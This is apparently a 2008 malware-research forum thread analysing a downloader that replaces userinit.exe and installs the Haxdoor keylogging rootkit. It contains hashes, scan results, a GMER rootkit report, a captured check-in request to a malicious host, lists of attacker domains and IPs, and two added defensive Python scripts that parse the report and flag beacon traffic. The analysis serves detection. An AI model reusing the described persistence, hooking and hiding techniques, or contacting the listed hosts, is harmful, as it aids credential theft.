file.exe - m.exe - ad.exe (Haxdoor rootkit)
B.I.S.S. Forums > Malware Research Forum > Malware Playground
Kimberly
<h4>
File details
</h4>
File.exe is saved as tyYOerV.exe on our computer.

Filename: tyYOerV.exe

File size: 7168 bytes
MD5...: d24069f365f21c6b1147c816ffe34c2a
SHA1..: a5296101631be4b311a7c81fbd2a4b4e7d826ca4
SHA256: d9eb17bd9c9879a508422f6d704bd2bbe14890732d6a53dbd953d1e127cdc099
PEiD: -
QUOTE
File tyYOerV.exe received on 08.05.2008 17:36:58 (CET)
AhnLab-V3 2008.8.6.0 2008.08.05 -
AntiVir 7.8.1.15 2008.08.05 -
Authentium 5.1.0.4 2008.08.05 -
Avast 4.8.1195.0 2008.08.05 -
AVG 8.0.0.156 2008.08.05 SHeur.CANO
BitDefender 7.2 2008.08.05 -
CAT-QuickHeal 9.50 2008.08.04 TrojanDownloader.Agent.xlu
ClamAV 0.93.1 2008.08.05 -
DrWeb 4.44.0.09170 2008.08.05 -
eSafe 7.0.17.0 2008.08.05 Suspicious File
eTrust-Vet 31.6.6011 2008.08.05 -
Ewido 4.0 2008.08.05 -
F-Prot 4.4.4.56 2008.08.04 -
Fortinet 3.14.0.0 2008.08.05 -
GData 2.0.7306.1023 2008.08.05 -
Ikarus T3.1.1.34.0 2008.08.05 -
K7AntiVirus 7.10.404 2008.08.05 -
Kaspersky 7.0.0.125 2008.08.05 -
McAfee 5353 2008.08.04 -
Microsoft 1.3807 2008.08.05 -
NOD32v2 3329 2008.08.05 -
Norman 5.80.02 2008.08.05 -
Panda 9.0.0.4 2008.08.04 Suspicious file
PCTools 4.4.2.0 2008.08.05 -
Prevx1 V2 2008.08.05 -
Rising 20.56.12.00 2008.08.05 -
Sophos 4.31.0 2008.08.05 -
Sunbelt 3.1.1537.1 2008.08.01 -
Symantec 10 2008.08.05 -
TheHacker 6.2.96.393 2008.08.04 -
TrendMicro 8.700.0.1004 2008.08.05 PAK_Generic.001
VBA32 3.12.8.2 2008.08.05 -
ViRobot 2008.8.5.1324 2008.08.05 -
VirusBuster 4.5.11.0 2008.08.04 -
Webwasher-Gateway 6.6.2 2008.08.05 Win32.Malware.gen (suspicious)
Kaspersky: Trojan-Downloader.Win32.Agent.zgz

<h4>
Notes
</h4>
Makes a backup of %system%\userinit.exe as %system%\stus.exe
Copies itself as %system%\userinit.exe so that the downloader is started when a user logs on. Ref.
QUOTE
c:\WINDOWS\system32\userinit.exe
Old date: 8/4/2004 2:00 PM
New date: 8/5/2008 5:31 PM
Old size: 24,576 bytes
New size: 7,168 bytes
Note: %System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

An instance of svchost.exe is launched by tyYOerV.exe.
A few moments later svchost.exe requests internet access.
The following files were downloaded
  • m.exe - saved as %Temp%\ie4.tmp
  • ad.exe - saved as %Temp%\ie6.tmp
Note: %Temp% is a variable that refers to the temporary folder. By default, this is C:\Documents and Settings\[UserName]\Local Settings\Temp\ (Windows NT/2000/XP).

<h4>
m.exe - ie4.tmp
</h4>
Filename: m.exe - ie4.tmp

File size: 135680 bytes
MD5...: 930371bcf7e30c81104c7a27351d14a4
SHA1..: 61b7f9b7cf115bdce1741fb120c4306f45fb2126
SHA256: a52891362f9c7e65d84452c2e744934211acf5a50e3428ec5577747b9922100b
PEiD: -
QUOTE
File ie4.tmp received on 08.05.2008 17:38:06 (CET)
AhnLab-V3 2008.8.6.0 2008.08.05 -
AntiVir 7.8.1.15 2008.08.05 -
Authentium 5.1.0.4 2008.08.05 -
Avast 4.8.1195.0 2008.08.05 -
AVG 8.0.0.156 2008.08.05 -
BitDefender 7.2 2008.08.05 -
CAT-QuickHeal 9.50 2008.08.04 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.08.05 -
DrWeb 4.44.0.09170 2008.08.05 -
eSafe 7.0.17.0 2008.08.05 Suspicious File
eTrust-Vet 31.6.6011 2008.08.05 -
Ewido 4.0 2008.08.05 -
F-Prot 4.4.4.56 2008.08.04 -
F-Secure 7.60.13501.0 2008.08.05 -
Fortinet 3.14.0.0 2008.08.05 -
GData 2.0.7306.1023 2008.08.05 -
Ikarus T3.1.1.34.0 2008.08.05 -
K7AntiVirus 7.10.404 2008.08.05 -
Kaspersky 7.0.0.125 2008.08.05 -
McAfee 5353 2008.08.04 -
Microsoft 1.3807 2008.08.05 -
NOD32v2 3329 2008.08.05 -
Norman 5.80.02 2008.08.05 -
Panda 9.0.0.4 2008.08.04 -
PCTools 4.4.2.0 2008.08.05 -
Prevx1 V2 2008.08.05 -
Rising 20.56.12.00 2008.08.05 -
Sophos 4.31.0 2008.08.05 -
Sunbelt 3.1.1537.1 2008.08.01 -
Symantec 10 2008.08.05 -
TheHacker 6.2.96.393 2008.08.04 -
TrendMicro 8.700.0.1004 2008.08.05 -
VBA32 3.12.8.2 2008.08.05 -
ViRobot 2008.8.5.1324 2008.08.05 -
VirusBuster 4.5.11.0 2008.08.04 -
Webwasher-Gateway 6.6.2 2008.08.05 -
Kaspersky: Trojan-Downloader.Win32.Small.aafl
Unfortunately the file closes with a fatal error upon execution in a VM. I suspect this to be one of those fake antivirus solutions. If possible I will update accordingly.
<h4>
ad.exe - ie6.tmp
</h4>
Filename: ad.exe - ie6.tmp

File size: 33924 bytes
MD5...: f35042e33f22e37608e4b3420cb2b654
SHA1..: c2a4fd953d173904bc787a4850867f69e7d70d67
SHA256: caa2ec11ac77e860ba02c551427fb9913792092d32f1b4b2164820ed91f970be
PEiD: UPX 2.90 [LZMA]
QUOTE
File ie6.tmp received on 08.05.2008 17:43:20 (CET)
AhnLab-V3 2008.8.6.0 2008.08.05 -
AntiVir 7.8.1.15 2008.08.05 TR/Crypt.XPACK.Gen
Authentium 5.1.0.4 2008.08.05 -
Avast 4.8.1195.0 2008.08.05 Win32:Spyware-gen
AVG 8.0.0.156 2008.08.05 Win32/Heur
BitDefender 7.2 2008.08.05 -
CAT-QuickHeal 9.50 2008.08.04 -
ClamAV 0.93.1 2008.08.05 -
DrWeb 4.44.0.09170 2008.08.05 -
eSafe 7.0.17.0 2008.08.05 Suspicious File
eTrust-Vet 31.6.6011 2008.08.05 -
Ewido 4.0 2008.08.05 -
F-Prot 4.4.4.56 2008.08.04 -
F-Secure 7.60.13501.0 2008.08.05 Trojan-Spy.Win32.Goldun.aqz
Fortinet 3.14.0.0 2008.08.05 -
GData 2.0.7306.1023 2008.08.05 Trojan-Spy.Win32.Goldun.aqz
Ikarus T3.1.1.34.0 2008.08.05 Trojan.Crypt.XPACK
K7AntiVirus 7.10.404 2008.08.05 -
Kaspersky 7.0.0.125 2008.08.05 Trojan-Spy.Win32.Goldun.aqz
McAfee 5353 2008.08.04 -
Microsoft 1.3807 2008.08.05 Trojan:Win32/Meredrop
NOD32v2 3329 2008.08.05 Win32/Spy.Goldun.NDF
Norman 5.80.02 2008.08.05 W32/Smalltroj.FRYT
Panda 9.0.0.4 2008.08.04 -
PCTools 4.4.2.0 2008.08.05 Trojan-Spy.Goldun!sd6
Rising 20.56.12.00 2008.08.05 -
Sophos 4.31.0 2008.08.05 Mal/Generic-A
Sunbelt 3.1.1537.1 2008.08.01 -
Symantec 10 2008.08.05 -
TheHacker 6.2.96.393 2008.08.04 -
TrendMicro 8.700.0.1004 2008.08.05 PAK_Generic.001
VBA32 3.12.8.2 2008.08.05 suspected of Malware-Cryptor.Win32.General.2
ViRobot 2008.8.5.1324 2008.08.05 -
VirusBuster 4.5.11.0 2008.08.04 -
Webwasher-Gateway 6.6.2 2008.08.05 Trojan.Crypt.XPACK.Gen
This is the Haxdoor rootkit. Haxdoor is able to capture all user keystrokes (including confidential details such as username, password, credit card number, etc.) and then sends the stolen info to a remote attacker.
Creates a memory page in the address space of Explorer.exe in order to load cryptmd5.dll.
Creates a global Keyboard hook.
Installs a kernel-mode driver into the system.
Explorer.exe listens for incoming connections.
The following data was requested from www.carrotz.cn using a special User Agent.
CODE
GET /country/data.php?trackid=[removed] HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; XP.2600.2976.xpsp2)
Host: www.carrotz.cn
~~~~~~~~~~: ~~~~~~~~~~
Rootkit Scan.
QUOTE
GMER 1.0.14.14536 - http://www.gmer.net
Rootkit scan 2008-08-05 18:49:39
Windows 5.1.2600 Service Pack 2


---- System - GMER 1.0.14 ----

SSDT \SystemRoot\system32\dx9sr.sys ZwCreateProcess [0xF4CAB145]
SSDT \SystemRoot\system32\dx9sr.sys ZwCreateProcessEx [0xF4CAAB7C]
SSDT \SystemRoot\system32\dx9sr.sys ZwOpenKey [0xF4CAA412]
SSDT \SystemRoot\system32\dx9sr.sys ZwOpenProcess [0xF4CAA227]
SSDT \SystemRoot\system32\dx9sr.sys ZwQueryDirectoryFile [0xF4CAA8C8]

Code \SystemRoot\system32\dx9sr.sys IoCreateFile
Code \SystemRoot\system32\dx9sr.sys IoGetCurrentProcess
Code \SystemRoot\system32\dx9sr.sys PsGetCurrentProcess

---- Kernel code sections - GMER 1.0.14 ----

PAGE ntoskrnl.exe!IoCreateFile 805714F7 5 Bytes JMP F4CAA45D \SystemRoot\system32\dx9sr.sys

---- User code sections - GMER 1.0.14 ----

.text C:\Tools\gmer.exe[164] ntdll.dll!LdrLoadDll 7C9161CA 5 Bytes JMP 0001009F
.text C:\Tools\gmer.exe[164] USER32.DLL!GetDlgItemTextA + 2 77D9AC08 5 Bytes JMP 000107AA
.text C:\Tools\gmer.exe[164] wininet.dll!HttpOpenRequestA 771C4AC5 5 Bytes JMP 000104D6
.text C:\Tools\gmer.exe[164] wininet.dll!InternetCloseHandle + 2 771C61DE 5 Bytes JMP 00010603
.text C:\Tools\gmer.exe[164] wininet.dll!InternetOpenA + 2 771C6D2C 5 Bytes JMP 00010486
.text C:\Tools\gmer.exe[164] wininet.dll!HttpSendRequestA 771C76B8 5 Bytes JMP 100036F0 C:\WINDOWS\system32\cryptmd5.dll
.text C:\Tools\gmer.exe[164] wininet.dll!InternetReadFile + 2 771C9557 5 Bytes JMP 00010008
.text C:\Tools\gmer.exe[164] wininet.dll!InternetQueryDataAvailable + 2 771D3261 5 Bytes JMP 00010598
.text C:\Tools\gmer.exe[164] wininet.dll!InternetReadFileExA + 2 771F7E9C 5 Bytes JMP 00010519
.text C:\Tools\gmer.exe[164] wininet.dll!HttpSendRequestW 77211808 5 Bytes JMP 1000368D C:\WINDOWS\system32\cryptmd5.dll

---- Processes - GMER 1.0.14 ----

Library C:\WINDOWS\system32\cryptmd5.dll (*** hidden *** ) @ C:\Tools\gmer.exe [164] 0x10000000
Library C:\WINDOWS\system32\cryptmd5.dll (*** hidden *** ) @ C:\WINDOWS\Explorer.EXE [1260] 0x019A0000

---- Registry - GMER 1.0.14 ----

Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptmd5
Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptmd5@DllName cryptmd5.dll
Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptmd5@Startup cryptmd5
Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptmd5@Impersonate 1
Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptmd5@Asynchronous 1
Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptmd5@MaxWait 1
Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptmd5@meth [02F47407C30270018]

Reg HKLM\SOFTWARE\Classes\COMSNAP.CPartitionNotify\CurVer
Reg HKLM\SOFTWARE\Classes\COMSNAP.CPartitionNotify\CurVer@ COMSNAP.CPartitionNotify.1
Reg HKLM\SOFTWARE\Classes\RsmSink.Notify\CLSID
Reg HKLM\SOFTWARE\Classes\RsmSink.Notify\CLSID@ {0022DFD7-0469-49ff-BDD4-192CB402F5C6}
Reg HKLM\SOFTWARE\Classes\RsmSink.Notify\CurVer
Reg HKLM\SOFTWARE\Classes\RsmSink.Notify\CurVer@ RsmSink.Notify.1

---- Files - GMER 1.0.14 ----

File C:\WINDOWS\system32\cryptmd5.dll 21638 bytes executable
File C:\WINDOWS\system32\dx9sr.sys 8624 bytes executable

---- Services - GMER 1.0.14 ----

Service C:\WINDOWS\system32\dx9sr.sys [SYSTEM] dx9sr

---- EOF - GMER 1.0.14 ----
Note: I left out legit entries in the rootkit scan as Haxdoor does hide the complete HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify key.
______________________________

Filename: cryptmd5.dll

File size: 21638 bytes
MD5...: 682b6cf1bdeba7362e03835f74490a93
SHA1..: 867736e0d4781d37c8c062de0cd8e733d430481b
SHA256: 473ae97a112b8cefacc6f743bca12973a34be3cb1593b148f53c18491e53c959
PEiD: -
QUOTE
File cryptmd5.dll received on 08.05.2008 17:58:54 (CET)
AhnLab-V3 2008.8.6.0 2008.08.05 -
AntiVir 7.8.1.15 2008.08.05 TR/Spy.Goldun.arb
Authentium 5.1.0.4 2008.08.05 -
Avast 4.8.1195.0 2008.08.05 -
AVG 8.0.0.156 2008.08.05 PSW.Generic6.VUZ
BitDefender 7.2 2008.08.05 -
CAT-QuickHeal 9.50 2008.08.04 -
ClamAV 0.93.1 2008.08.05 -
DrWeb 4.44.0.09170 2008.08.05 -
eSafe 7.0.17.0 2008.08.05 Suspicious File
eTrust-Vet 31.6.6011 2008.08.05 -
Ewido 4.0 2008.08.05 -
F-Prot 4.4.4.56 2008.08.04 -
Fortinet 3.14.0.0 2008.08.05 -
GData 2.0.7306.1023 2008.08.05 Trojan-Spy.Win32.Goldun.arb
Ikarus T3.1.1.34.0 2008.08.05 Trojan-Spy.Win32.Goldun.arb
K7AntiVirus 7.10.404 2008.08.05 -
Kaspersky 7.0.0.125 2008.08.05 Trojan-Spy.Win32.Goldun.arb
McAfee 5353 2008.08.04 -
Microsoft 1.3807 2008.08.05 -
NOD32v2 3329 2008.08.05 Win32/Spy.Goldun.NCW
Norman 5.80.02 2008.08.05 W32/Goldun.CGS
Panda 9.0.0.4 2008.08.04 -
PCTools 4.4.2.0 2008.08.05 Trojan-Spy.Goldun!sd6
Prevx1 V2 2008.08.05 Suspicious
Rising 20.56.12.00 2008.08.05 -
Sophos 4.31.0 2008.08.05 Mal/TinyDL-T
Sunbelt 3.1.1537.1 2008.08.01 -
Symantec 10 2008.08.05 -
TheHacker 6.2.96.393 2008.08.04 -
TrendMicro 8.700.0.1004 2008.08.05 PAK_Generic.001
VBA32 3.12.8.2 2008.08.05 suspected of Trojan-Spy.Banker.49 (paranoid heuristics)
ViRobot 2008.8.5.1324 2008.08.05 -
VirusBuster 4.5.11.0 2008.08.04 -
Webwasher-Gateway 6.6.2 2008.08.05 Trojan.Spy.Goldun.arb
______________________________

Filename: dx9sr.sys

File size: 8624 bytes
MD5...: a45a48dd29da9997eea867944771c63c
SHA1..: a1ac58d5b10dad4e8c1c810e33ea3a8e0448d56a
SHA256: d1b376998d7ffd0f73b31ee964020d5fe2236d7b4c5697a9659611ba6e0bb560
PEiD: -
QUOTE
File dx9sr.sys received on 08.05.2008 18:00:07 (CET)
AhnLab-V3 2008.8.6.0 2008.08.05 -
AntiVir 7.8.1.15 2008.08.05 TR/Rootkit.Gen
Authentium 5.1.0.4 2008.08.05 W32/Goldun.gen3
Avast 4.8.1195.0 2008.08.05 -
AVG 8.0.0.156 2008.08.05 PSW.Generic6.VVB
BitDefender 7.2 2008.08.05 -
CAT-QuickHeal 9.50 2008.08.04 -
ClamAV 0.93.1 2008.08.05 -
DrWeb 4.44.0.09170 2008.08.05 -
eSafe 7.0.17.0 2008.08.05 -
eTrust-Vet 31.6.6011 2008.08.05 Win32/ProcHide!generic
Ewido 4.0 2008.08.05 -
F-Prot 4.4.4.56 2008.08.04 W32/Goldun.gen3
F-Secure 7.60.13501.0 2008.08.05 Trojan-Spy.Win32.Goldun.ara
Fortinet 3.14.0.0 2008.08.05 -
GData 2.0.7306.1023 2008.08.05 Trojan-Spy.Win32.Goldun.ara
Ikarus T3.1.1.34.0 2008.08.05 Backdoor.Win32.Agent.fpj
K7AntiVirus 7.10.404 2008.08.05 Trojan-Spy.Win32.Goldun.ara
Kaspersky 7.0.0.125 2008.08.05 Trojan-Spy.Win32.Goldun.ara
McAfee 5353 2008.08.04 -
Microsoft 1.3807 2008.08.05 Backdoor:Win32/Haxdoor
NOD32v2 3329 2008.08.05 Win32/Spy.Goldun.NDF
Norman 5.80.02 2008.08.05 -
Panda 9.0.0.4 2008.08.04 -
PCTools 4.4.2.0 2008.08.05 Trojan-Spy.Goldun!sd6
Prevx1 V2 2008.08.05 -
Rising 20.56.12.00 2008.08.05 -
Sophos 4.31.0 2008.08.05 -
Sunbelt 3.1.1537.1 2008.08.01 -
Symantec 10 2008.08.05 -
TheHacker 6.2.96.393 2008.08.04 -
TrendMicro 8.700.0.1004 2008.08.05 -
VBA32 3.12.8.2 2008.08.05 suspected of Rootkit.Agent.10
ViRobot 2008.8.5.1324 2008.08.05 -
VirusBuster 4.5.11.0 2008.08.04 -
Webwasher-Gateway 6.6.2 2008.08.05 Trojan.Rootkit.Gen
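Turning the GMER report quoted above into a list of indicators, as an added example that is not part of Kimberly's post. The script takes a GMER text report (a trimmed copy of the one above is embedded as constructed sample input), pulls out the SSDT and inline kernel hooks owned by dx9sr.sys, the user-mode hooks and the hidden cryptmd5.dll module, the Winlogon\Notify package and the file and service entries, and returns the set of files implicated by the hooks. The line formats are taken from the report exactly as printed here; other GMER versions may print them differently, and the function names are my own.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample input: a trimmed copy of the GMER report quoted in the post above.
SAMPLE_REPORT = r"""
GMER 1.0.14.14536 - http://www.gmer.net
Rootkit scan 2008-08-05 18:49:39

---- System - GMER 1.0.14 ----

SSDT \SystemRoot\system32\dx9sr.sys ZwCreateProcess [0xF4CAB145]
SSDT \SystemRoot\system32\dx9sr.sys ZwOpenKey [0xF4CAA412]
SSDT \SystemRoot\system32\dx9sr.sys ZwQueryDirectoryFile [0xF4CAA8C8]

---- Kernel code sections - GMER 1.0.14 ----

PAGE ntoskrnl.exe!IoCreateFile 805714F7 5 Bytes JMP F4CAA45D \SystemRoot\system32\dx9sr.sys

---- User code sections - GMER 1.0.14 ----

.text C:\Tools\gmer.exe[164] ntdll.dll!LdrLoadDll 7C9161CA 5 Bytes JMP 0001009F
.text C:\Tools\gmer.exe[164] wininet.dll!InternetReadFile + 2 771C9557 5 Bytes JMP 00010008
.text C:\Tools\gmer.exe[164] wininet.dll!HttpSendRequestA 771C76B8 5 Bytes JMP 100036F0 C:\WINDOWS\system32\cryptmd5.dll

---- Processes - GMER 1.0.14 ----

Library C:\WINDOWS\system32\cryptmd5.dll (*** hidden *** ) @ C:\WINDOWS\Explorer.EXE [1260] 0x019A0000

---- Registry - GMER 1.0.14 ----

Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptmd5
Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptmd5@DllName cryptmd5.dll
Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptmd5@Asynchronous 1

---- Files - GMER 1.0.14 ----

File C:\WINDOWS\system32\cryptmd5.dll 21638 bytes executable
File C:\WINDOWS\system32\dx9sr.sys 8624 bytes executable

---- Services - GMER 1.0.14 ----

Service C:\WINDOWS\system32\dx9sr.sys [SYSTEM] dx9sr

---- EOF - GMER 1.0.14 ----
"""

# One pattern per GMER line type. Hook addresses are deliberately not captured: they
# differ from machine to machine and are useless as indicators.
SSDT_RE = re.compile(r"^SSDT\s+(?P<owner>\S+)\s+(?P<func>Zw\w+)\s+\[0x[0-9A-Fa-f]+\]")
KHOOK_RE = re.compile(r"^(?:PAGE|INIT|\.text)\s+(?P<module>\S+)!(?P<func>\w+)\s+[0-9A-Fa-f]+"
                      r"\s+\d+\s+Bytes\s+JMP\s+[0-9A-Fa-f]+\s+(?P<owner>\S+)")
UHOOK_RE = re.compile(r"^\.text\s+(?P<proc>.+?)\[(?P<pid>\d+)\]\s+(?P<module>\S+)!(?P<func>\w+)"
                      r"(?:\s+\+\s+\d+)?\s+[0-9A-Fa-f]+\s+\d+\s+Bytes\s+JMP\s+[0-9A-Fa-f]+"
                      r"(?:\s+(?P<owner>\S+))?$")
HIDDEN_RE = re.compile(r"^Library\s+(?P<lib>\S+)\s+\(\*\*\* hidden \*\*\* \)\s+@\s+(?P<proc>.+?)\s+\[\d+\]")
REG_RE = re.compile(r"^Reg\s+(?P<key>[^@]+?)(?:@(?P<name>\S*)\s*(?P<value>.*))?$")
NOTIFY_RE = re.compile(r"\\Winlogon\\Notify\\(?P<package>[^\\]+)$", re.IGNORECASE)
FILE_RE = re.compile(r"^File\s+(?P<path>.+?)\s+(?P<size>\d+)\s+bytes")
SERVICE_RE = re.compile(r"^Service\s+(?P<image>\S+)\s+\[\w+\]\s+(?P<name>\S+)")


def basename(path):
    r"""Lower-cased file name of a Windows path such as \SystemRoot\system32\dx9sr.sys."""
    return PureWindowsPath(path).name.lower()


def parse_gmer(text):
    """Collect the rootkit-relevant entries of a GMER text report, keyed by entry type."""
    found = {
        "ssdt_hooks": [],           # (syscall, hooking driver)
        "kernel_inline_hooks": [],  # ("module!function", hooking driver)
        "user_hooks": [],           # (process, "module!function", hooking DLL or None)
        "hidden_modules": [],       # (DLL, host process it is hidden in)
        "winlogon_notify": {},      # package -> {value name: value}
        "files": [],                # (path, size in bytes)
        "services": [],             # (service name, image file)
    }
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("----"):
            continue
        if m := SSDT_RE.match(line):
            found["ssdt_hooks"].append((m["func"], basename(m["owner"])))
        elif m := KHOOK_RE.match(line):
            found["kernel_inline_hooks"].append((f"{m['module']}!{m['func']}", basename(m["owner"])))
        elif m := UHOOK_RE.match(line):
            owner = basename(m["owner"]) if m["owner"] else None
            found["user_hooks"].append((m["proc"], f"{m['module']}!{m['func']}", owner))
        elif m := HIDDEN_RE.match(line):
            found["hidden_modules"].append((basename(m["lib"]), m["proc"]))
        elif m := REG_RE.match(line):
            # Only the Winlogon\Notify branch is kept: that is the persistence Haxdoor uses.
            if n := NOTIFY_RE.search(m["key"]):
                values = found["winlogon_notify"].setdefault(n["package"], {})
                if m["name"] is not None:
                    values[m["name"]] = m["value"]
        elif m := FILE_RE.match(line):
            found["files"].append((m["path"], int(m["size"])))
        elif m := SERVICE_RE.match(line):
            found["services"].append((m["name"], basename(m["image"])))
    return found


def implicated_modules(found):
    """Files that own a kernel or user-mode hook, or are hidden from a process' module list."""
    names = {owner for _, owner in found["ssdt_hooks"]}
    names |= {owner for _, owner in found["kernel_inline_hooks"]}
    names |= {owner for _, _, owner in found["user_hooks"] if owner}
    names |= {lib for lib, _ in found["hidden_modules"]}
    return sorted(names)


def unbacked_user_hooks(found):
    """User-mode hooks whose JMP target GMER could not attribute to any loaded module."""
    return [(proc, func) for proc, func, owner in found["user_hooks"] if owner is None]


if __name__ == "__main__":
    found = parse_gmer(SAMPLE_REPORT)
    print("modules implicated:", implicated_modules(found))
    print("SSDT hooks:", found["ssdt_hooks"])
    print("Winlogon Notify packages:", found["winlogon_notify"])
    print("hooks into memory not backed by a module:", unbacked_user_hooks(found))
```

Two caveats when using this on a live host rather than on the saved report: the ZwQueryDirectoryFile and ZwOpenKey hooks are what hide dx9sr.sys, cryptmd5.dll and the Notify key from ordinary tools, so only a scanner that reaches the disk and registry below those hooks (or an offline boot) produces a report worth parsing; and a user-mode hook whose target GMER cannot attribute to a module (the 0001xxxx targets above) points at code copied into unbacked memory and deserves a memory dump rather than a file hash.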
Kimberly
<h4>
Update on m.exe - ie4.tmp
</h4>
Screenshots are pretty explicit ... www.winifixer.com - av-xp-08.com - youpornztube.net
There's a lot more like ...
  • Dumping installed software
  • Dumping running processes
  • Platform
  • Processor
  • etc ...
but I'm really not an enthusiast of those fake antivirus applications.

Couple of older write-ups for those interested.
<h4>
IP details
</h4>
58.65.234.81
  1. bulletproof-service.com
  2. cmd1.net
  3. dataupsup.com
  4. feels-energy.com
  5. forexnamtrade.com
  6. googleartz.com
  7. harsdorfsgroup.com
  8. hosting-offshore.biz
  9. j-sex.biz
  10. kup9.com
  11. latviawebfinance.com
  12. love-true.com
  13. novii-forum-pro.com
  14. platinbank.net
  15. probiva.cn
  16. probiva.net
  17. secretdesire.biz
  18. togmonet.biz
  19. universal-chat.net
  20. viennafinance.net
  21. worldsecret.ws
  22. wsccinternational.com
______________________________

202.75.38.130
  1. carrotz.cn
  2. gazenvagen.com
  3. googleprank.cn
  4. musicstreamnet.info
  5. zarazza.cn
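Matching the check-in traffic against this infrastructure, as an added example that is not part of either post. The classifier takes a raw HTTP request as captured in the first post (the trackid value was redacted there, so the embedded sample uses a placeholder) and flags it on three independent grounds: the Host or resolved IP is in the list above, the path is the /country/data.php?trackid= beacon, and the User-Agent claims MSIE 6.0 but carries an XP build string where a real Internet Explorer 6 sends a "Windows NT 5.1" platform token. The domain set is a subset of the list above; the function names, the samples and the User-Agent heuristic are mine.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Infrastructure from the IP details above: the two hosting IPs and some of the domains
# that resolved to them at the time. Extend from the full list as needed.
HAXDOOR_IPS = {"58.65.234.81", "202.75.38.130"}
HAXDOOR_DOMAINS = {
    "carrotz.cn", "gazenvagen.com", "googleprank.cn", "musicstreamnet.info", "zarazza.cn",
    "bulletproof-service.com", "hosting-offshore.biz", "probiva.cn", "probiva.net",
}

# Beacon shape from the capture in the first post: GET /country/data.php?trackid=...
# with an MSIE 6.0 User-Agent whose platform token is an XP build string instead of the
# "Windows NT 5.1" token a genuine Internet Explorer 6 sends.
BEACON_PATH = "/country/data.php"
FAKE_XP_UA_RE = re.compile(r"MSIE 6\.0; XP\.\d+\.\d+\.xpsp\d\)")


def parse_request(raw):
    """Split a raw HTTP request into (method, target, version, headers); header names lower-cased."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    request_line, *header_lines = head.split("\n")
    method, target, version = (request_line.split(" ", 2) + ["", ""])[:3]
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, version, headers


def in_domain_list(host):
    """True for a listed domain or any subdomain of it (www.carrotz.cn matches carrotz.cn)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in HAXDOOR_DOMAINS)


def classify(raw, resolved_ip=None):
    """Return the reasons a request looks like Haxdoor traffic; an empty list means clean."""
    method, target, _version, headers = parse_request(raw)
    host = headers.get("host", "").split(":", 1)[0]
    ua = headers.get("user-agent", "")
    url = urlsplit(target)
    reasons = []
    if in_domain_list(host):
        reasons.append(f"Host {host} is in the Haxdoor infrastructure list")
    if resolved_ip in HAXDOOR_IPS:
        reasons.append(f"destination {resolved_ip} is in the Haxdoor infrastructure list")
    if method == "GET" and url.path == BEACON_PATH and "trackid" in parse_qs(url.query):
        reasons.append("check-in beacon GET /country/data.php?trackid=")
    if FAKE_XP_UA_RE.search(ua):
        reasons.append("forged IE 6 User-Agent carrying an XP build string")
    elif "MSIE 6.0" in ua and "Windows NT" not in ua:
        reasons.append("MSIE 6.0 User-Agent without a Windows NT platform token")
    return reasons


# Constructed samples. BEACON reproduces the capture from the first post with a
# placeholder where the trackid value was redacted; the other two are made up.
BEACON = (
    "GET /country/data.php?trackid=PLACEHOLDER HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; XP.2600.2976.xpsp2)\r\n"
    "Host: www.carrotz.cn\r\n\r\n"
)
NORMAL_IE6 = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n\r\n"
)
SIBLING_DOMAIN = (
    "GET / HTTP/1.1\r\n"
    "Host: gazenvagen.com\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n\r\n"
)

if __name__ == "__main__":
    for label, sample in (("beacon", BEACON), ("normal", NORMAL_IE6), ("sibling", SIBLING_DOMAIN)):
        print(label, classify(sample))
```

The domain and IP checks are the durable part; the beacon path and the User-Agent string are specific to this variant and will not survive a rebuild of the downloader, so treat a User-Agent-only hit as a lead rather than a verdict.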